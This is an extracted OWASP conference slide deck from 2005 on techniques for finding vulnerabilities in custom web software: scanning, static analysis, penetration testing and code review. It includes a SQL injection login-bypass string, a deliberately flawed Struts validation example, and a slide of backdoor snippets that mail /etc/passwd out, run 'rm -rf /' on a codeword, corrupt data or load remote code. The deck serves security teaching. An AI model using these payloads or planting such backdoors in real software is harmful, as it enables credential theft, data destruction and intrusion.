Date post: | 14-May-2015 |
Category: |
Technology |
Upload: | baoyin |
View: | 1,229 times |
Download: | 1 times |
Copyright © 2004 - The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.
The OWASP Foundation
4th Annual NTC ISSA InfoSec Nashville Conference August 24, 2005
http://www.owasp.org
The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software
Jeff WilliamsCEO, Aspect SecurityChair, OWASP [email protected]
2OWASP
The Future
Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1
Software Facts
Modules 155 Modules from Libraries 120
% Vulnerability*
* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:
Cross Site Scripting 22 65%
SQL Injection 2Buffer Overflow 5
Total Security Mechanisms 3
Encryption 3
Authentication 15
95%
Modularity .035
Cyclomatic Complexity 323
Access Control 3
Input Validation 233
Logging 33
Expected Number of Users 15Typical Roles per Instance 4
Reflected 12
Stored 10
Cross Site Scripting Less Than 10 5 Reflected Less Than 10 5 Stored Less Than 10 5SQL Injection Less Than 20 2Buffer Overflow Less Than 20 2Security Mechanisms 10 14 Encryption 3 15
Usage Intranet Internet
3OWASP
Today
Code is code All sectors All languages All platforms All computing models All sizes Intra/Extra/Inter-net
New types of vulnerabilities are rare
The market doesn’t value secure code
We trust code we shouldn’t
Cheaper, faster only
We don’t have any idea whether our code is trustworthy or not
4OWASP
Why Find Vulnerabilities?
Nobody believes their software is vulnerable“If the software works, then it must be secure”
Finding flaws starts you on the path
FindFlaws Fix Find
Flaws Improve FindFlaws Improve
If you’re not finding them, you’re allowing them
5OWASP
Software Is A Black Box
ComplexMillions of lines of codeLayers of leaky abstractionsMassively interconnected
CompiledDifficult to reverse engineerDifferent on every platform
Legal ProtectionsNo peekingWe’re not liable
6OWASP
Key Vulnerabilities
A few serious common vulnerabilities…Broken Access ControlWeak Authentication and Session ManagementSQL InjectionCross Site Scripting
For more information see… The Top Ten Most Critical Web Application Vulnerabilities
(www.owasp.org/documentation/topten.html)
A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)
7OWASP
SQL Injection Illustrated
Fir
ewal
l
Hardened OS
Web Server
App ServerF
irew
all
Dat
abas
es
Leg
acy
Sys
tem
s
Web
Ser
vice
s
Dir
ecto
ries
Hu
man
Res
rcs
Bill
ing
Custom Code
APPLICATIONATTACK
Net
wo
rk L
ayer
Ap
plic
atio
n L
ayer
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
n
Tra
nsa
ctio
ns
Co
mm
un
icat
ion
Kn
ow
led
ge
Mg
mt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
HTTP
requestSQL
queryDB
Table
HTTP
response
“SELECT * FROM users WHERE user=‘’ OR
1=1--’ AND pass=‘password’”
1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
Successful Login“Welcome, Alice”
4. Database runs query containing attack and sends results to application
5. Application thinks login worked and sends welcome page
8OWASP
Scanning for SQL Injection
MethodUse “signatures” to send malformed SQL
commandsAnalyze responses to see if it “worked”Nessus, nikto, absinthe
ProsRequires only network access to applicationFast and easy to run
ConsMay only exercise part of an applicationProne to false alarms and missed positivesResults indicate URL but not line of codeCan be problems with credentials, roles, and SSL
9OWASP
Static Analysis for SQL Injection
MethodAutomatically analyze source code for patternsTools load source code, compile, and analyze
ProsRequires only the software baselineFast and easy to run
ConsCan’t factor in the runtime environmentProne to false alarms and missed positivesResults indicate line of code but not URLDoesn’t find design problems
10OWASP
Penetration Testing for SQL Injection
MethodCustom attacks by an expert security testerUse OWASP WebScarab to craft custom attacksExpert analyzes responses to see if attack worked
ProsOpen source tools availableRecommend an internal team
ConsRequires expertise in security, software, and SQLDifficult to exercise the entire applicationTester may not be able to determine success
11OWASP
Code Review for SQL Injection
MethodReviewer analyzes code for patternsUse tools to view baseline in different waysExamine mechanisms, common vulnerability
areas
ProsCost-effectiveCan examine the entire baseline
ConsCan’t factor in the runtime environmentRequires skills in software and security
12OWASP
Security Analysis Techniques
Find Vulnerabilities Using the Running Application
Find Vulnerabilities Using the Source Code
AutomatedAutomatedVulnerabilityVulnerabilityScanningScanning
AutomatedAutomatedStatic CodeStatic Code
AnalysisAnalysis
ManualManualPenetrationPenetrationTestingTesting
ManualManualCodeCode
ReviewReview
Combining All Four Techniques is Most Effective
13OWASP
Vulnerability Patternspublic class DamagedStrutsForm extends ActionForm{public void doForm( HttpServletRequest request) {
UserBean u = session.getUserBean();u.setName(request.getParameter("name"));u.setFavoriteColor(request.getParameter("color"));
}
public boolean validate( HttpServletRequest request) {try {
if ( request.getParameter("Name").indexOf("<scri") != -1 ) {logger.log("Script detected" );return false;
}}catch( Exception e ) {}return true;
}}
Failure to Validate
Blacklist Validation
Fail Open
Failure to Validate
Time of Check, Time of Use
Failure to Validate
14OWASP
A Change In Perspective
Think like an attacker!Understand how the application worksEspecially the security mechanismsHow does the application make security decisions
The easy part?Test and analyze for a single vulnerability
The hard part?Do an entire application for all types of
vulnerabilities
15OWASP
Getting Started
Adopt the OWASP Top TenSet the bar
Spot check a few applicationsAre your security mechanisms easy to
understand?Are you doing validation, error handling, logging,
etc?
Get security out in the open!
Come to my talk later to find out more!!!
16OWASP
OWASP Can Help
Open Web Application Security ProjectNonprofit FoundationAll materials available under approved open
source licensesDozens of projects, over 50 chapters
worldwide, thousands of participants, and millions of hits a month
OWASP is dedicated to finding and fighting the causes of insecure software
17OWASP
OWASP Supports Vulnerability Analysis
OWASP Top Ten Set priorities, get management buy-in
OWASP Guide 300 page book for application security
OWASP Testing Guide Test/analysis methods for application security
OWASP WebScarab Web application & web service penetration tool
18OWASP
Some of What You’ll Find at OWASP
Community Local Chapters Translations Conferences Mailing Lists Papers and more…
All free and open source We encourage your
company to support us by becoming a member
Documentation Guide Top Ten Testing Legal AppSec FAQ and more…
Tools WebGoat WebScarab Stinger DotNet and more…
19OWASP
What Could a Malicious Developer Do?
Trojan Horse runs for adminif ( System.getCurrentUser().getName().equals( “admin” ) ) Runtime.exec( “sendmail [email protected] < /etc/passwd” );
Secret trigger removes all files on root partitionif( req.getParameter( “codeword” ).equals( “eagle” ) ) Runtime.exec( “rm –rf /” );
Randomly corrupt data one time in 100if ( Math.random() < .01 ) bean.setValue( “corrupt” );
Load and execute code from remote server((A)(ClassLoader.getSystemClassLoader().defineClass (null,readBytesFromNetwork(),0,422).newInstance())).attack();
Make backdoor look like inadvertent mistakeif ( input < 0 ) throw new RuntimeException( “Input error” );
Impossible to tell malicious from mistake
Who wrote the libraries your application uses?
OWASP
AQ&Q U E S T I O N SQ U E S T I O N S
A N S W E R SA N S W E R S
Q&A